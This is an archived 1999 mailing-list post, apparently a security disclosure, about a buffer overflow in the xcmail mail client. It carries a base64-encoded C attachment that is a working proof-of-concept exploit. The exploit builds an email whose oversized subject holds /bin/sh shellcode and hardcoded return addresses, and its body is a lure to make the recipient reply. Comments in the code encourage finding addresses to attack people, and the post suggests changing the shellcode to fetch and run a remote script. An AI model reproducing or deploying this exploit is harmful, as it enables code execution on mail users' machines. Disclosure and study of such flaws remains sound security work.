This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---1228522812-218270008-920331681=:1136 Content-Type: TEXT/PLAIN; charset=US-ASCII -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I have found a vulnerability in xcmail that is exploitable, a simple buffer overflow vulnerability. The bug appears when replying to a message with a long subject line, and only when autoquote is on (dunno why... i didn't have time to read the sources, and I'm so lazy) .... the exploit is trivial, but as the buffer is not very large you have to do very precise return address calculation, and i believe it IS remotely exploitable, but you have to know a lot about the machine you want to gain acces to... so this definitely won't be useful to script kiddies (rootshell.com folks: don't waste your time ;) maybe one could upload a script by ftp, and modify the shellcode so that it copies the file to /tmp, chmod()s it and executes it... sample exploit attached. THE AUTHORS HAVE BEEN NOTIFIED, and they responded quickly. - -- [ WWW page ] http://www.multimania.com/xsfx/ [ PGP key ] http://www.multimania.com/xsfx/files/XSFX.key - [ IRC ] EFnet / IRCnet [ ICQ # ] 26995402 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQA/AwUBNtslrnzELLdog5QhEQJbXgCffU7u/2JaO8nVtn7gCwphp5Ta3w4An3Cn 2IryEigG2+De4zaiVF6XWsN+ =lKAd -----END PGP SIGNATURE----- ---1228522812-218270008-920331681=:1136 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN; name="xcmail_exp.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.04.9903020041210.1136at_private> Content-Description: Content-Disposition: attachment; filename="xcmail_exp.c" DQovKiAJCQkJCQkJCTI3LzAyLzE5OTkgDQogICAgZXhwbG9pdCBieSBYU0ZY QGluYW1lLmNvbS4uLi4gdGhpcyBidWcgaXMgbm90IGV4cGxvaXRhYmxlIGlu IGFueQkNCiAgICBoYXJtZnVsIHdheSwgYXQgbGVhc3Qgbm90IGVhc2lseSA6 KQkJCQkJDQogCQkJCQkJCQkJDQogCXRoaXMgb25seSB3b3JrcyBpZiB0YXJn ZXQgeGMtbWFpbCBoYXMgZW5hYmxlZAkJCQ0KIAknQXV0b3F1b3RlJyAoUHJl ZmVyZW5jZXMgbWVudSAtPiBRdW90ZSAtPiBBdXRvcXVvdGUpIAkJDQoNCg0K ICAgR2l2ZW4gRVNQIHZhbHVlcyBhcmUgZm9yIA0KICAgIA0KICAgID4+Pj4g Z2xpYmMyIDAuOTkuNiBkeW5hbWljYWxseSBsaW5rZWQgb2ZmaWNpYWwgYmlu YXJ5IDw8PDwNCg0KICAgIG9ubHkgd2hlbiB1c2VycyBjbGlja3MgJ3JlcGx5 JyBpbiB0aGUgbWVzc2FnZSBsaXN0IHdpbmRvdywNCiAgICBOT1Qgd2hlbiBy ZWFkaW5nIG1lc3NhZ2UgYW5kIGNsaWNraW5nICdyZXBseScuLi4NCiANCiAg ICBub3RlOiBmaW5kIHlvdXIgb3duIGFkcmVzc2VzIGlmIHlvdSB3YW50IHRv IGZ1Y2sgcGVvcGxlIG92ZXIsIGFuZCBnZXQNCgkgIGFuIGV2aWwgc2hlbGxj b2RlIDopIGFuZCByZW1lbWJlciwgdGhlIGJ1ZmZlciBpcyB2ZXJ5IHNtYWxs Li4uDQoNCgkweGJmZmZmMTQwIGluIEV0ZXJtIGxhdW5jaGVkIGZyb20gV01h a2VyIA0KCTB4YmZmZmU5ZjkgaW4geHRlcm0gbGF1bmNoZWQgZnJvbSBFdGVy bS4uLiANCgkweGJmZmZlYjEwIGFzIHJvb3QsIGluIHh0ZXJtLCBmcm9tIHhp bml0cmMgCQkNCgkJCQkJCQkJCSovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0K DQojaWZuZGVmIEVTUA0KI2RlZmluZQlFU1AJMHhiZmZmZjE0MAkNCiNlbmRp Zg0KDQojaWZuZGVmIE5PUA0KI2RlZmluZSBOT1AgCSdBJwkvKiB0aGlzIHdp bGwgYXBwZWFyIGluIHN1YmplY3Qgb2YgZXZpbCBtZXNzYWdlICovDQojZW5k aWYJCQkvKiBzbyBtYXliZSBOT1AgKDB4OTApIGlzIGEgYmV0dGVyIGNob2lj ZS4uLg0KDQoJCQkgICBidXQgJ0EncyBhcmUgZWFzaWVyIHRvIHNwb3Qgd2hl biBicm93c2luZyB0aHJ1DQoJCQkgICBtZW1vcnkgdG8gZmluZCBidWZmZXIg YWRyZXNzIDopICovDQoJCQkNCmNoYXIgc2hlbGxjb2RlW10gPSAJIlx4ODlc eGUxXHgzMVx4YzBceDUwXHg4ZFx4NWNceDI0XHhmOVx4ODMiDQoJCQkiXHhj NFx4MGNceDUwXHg1M1x4ODlceGNhXHhiMFx4MGJceGNkXHg4MCINCgkJCSIv YmluL3NoIjsNCgkNCgkvKiBTaGVsbGNvZGUgZnJvbSBXaWxseSBUYXJyZWF1 ICgyMCBieXRlcykgKi8NCg0KLyogc3RhdGljIGlubGluZSBnZXRlc3AoKSB7 DQogKiAgX19hc21fXygiIG1vdmwgJWVzcCwlZWF4ICIpOw0KICogfSAqLw0K ICANCm1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQ0Kew0KCWxvbmcgdW5z aWduZWQgZXNwOw0KCWludCBpLG5vcHM9MDsgDQoNCglwcmludGYoIkZyb20g cG9wM0AxOTIuMTM0LjE5Mi4xMTIgV2VkIERlYyAgMiAxOToyNzo1NyAxOTk4 XG4iKTsNCglwcmludGYoIkRhdGU6IFdlZCwgMjUgRGVjIDE5OTggMDA6MDA6 MDAgKzAwMDBcbiIpOw0KCXByaW50ZigiRnJvbTogMHowbjMgPGZyaWVuZEBs b2NhbGhvc3Q+XG4iKTsNCgkNCglwcmludGYoIlN1YmplY3Q6ICIpOw0KDQoJ Zm9yIChpPTA7aTwoMjA0IC0gc3RybGVuKHNoZWxsY29kZSkpO2krKykgDQoJ ew0KCQlwdXRjaGFyKE5PUCk7DQoJCW5vcHMrKzsNCgl9DQoJDQoJcHJpbnRm KHNoZWxsY29kZSk7DQoJDQovKgllc3AgPSBnZXRlc3AoKTsJCSovDQoJZXNw ID0gRVNQOw0KCQ0KCWZwcmludGYoc3RkZXJyLCAic2FtcGxlIGV4cGxvaXQg YnkgWFNGWEBpbmFtZS5jb21cbiINCgkJCSJERUJVRzogJWQgTk9Qc1xuIg0K CQkJIkRFQlVHOiB1c2luZyAlI3ggKGdldGVzcCgpJStkKSBhcyBzaGVsbGNv ZGUgYWRkcmVzc1xuIiwNCgkJCW5vcHMsZXNwLGVzcC1nZXRlc3AoKSk7DQoJ DQoJZndyaXRlKCZlc3AsNCwxLHN0ZG91dCk7DQoJcHV0YygnXG4nLHN0ZG91 dCk7DQoJDQoJcHJpbnRmKCJNZXNzYWdlLUlkOiA8MTk5ODEyMDIxODI3LlRB QTIzMTEyQDAwMy5keW4ubWwub3JnPlxuIik7DQoJcHJpbnRmKCJUbzogXCJk ZWFyIHVzZXJcIiA8eW91QGRvbWFpbi5jb20+XG4iKTsNCglwcmludGYoIlxu Iik7DQoJcHJpbnRmKCJoZWxsbyAhIHBsZWFzZSByZXBseSwgaSdtIG5vdCBz dXJlIG15IGVtYWlsIGJveCBpcyBvayA6KFxuIik7DQoJcHJpbnRmKCJcbiIp Ow0KfQ0KDQovKiAgR3JlZXRpbmdzOiB0byBKZXJvbWVfLCBEdW5rYWhuLCBs aW9uZWwgZG91eCwgbmlhcmsgZG91eCwgDQogICAga2V2aW4gbWl0bmljayBs J2FtaXMgZGVzIGtvYWxhcyBoZXJnb3Ro6XJhcGV1dGVzIGFuZCB0bw0KICAg IG15IGNhbm5hYmlzIHNlZWRzIHdoaWNoIGFyZSBncm93aW5nIG9uIHRoZWly IG93biB3aGlsZSBJJ20gY29kaW5nIDopIA0KICAgIGFuZCB0byBhbGwgdGhl IEFtaWRvdXggaW4gdGhlIHdvcmxkLg0KICAgIFBlYWNlIDopCQkJCQkJCQkN CiAgICANCiAgICBub3RlIHRoYXQgdGhpcyBleHBsb2l0IGlzIG5vdCB2ZXJ5 IHVzYWJsZSBhcy1pcywgY2F1c2UgeGMtbWFpbCBpcyBub3QNCiAgICBzdWlk IHJvb3QuLi4gYnV0IGlmIHlvdSwgazFkMTEzLCBmaW5kIGEgd2F5IHRvIGdl dCBhIHJlbW90ZSB4dGVybSA6KQ0KICAgIGdvb2QgbHVjayA6KQ0KICAgIAkJ CQkJCQkJCSovDQo= ---1228522812-218270008-920331681=:1136--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:37:58 PDT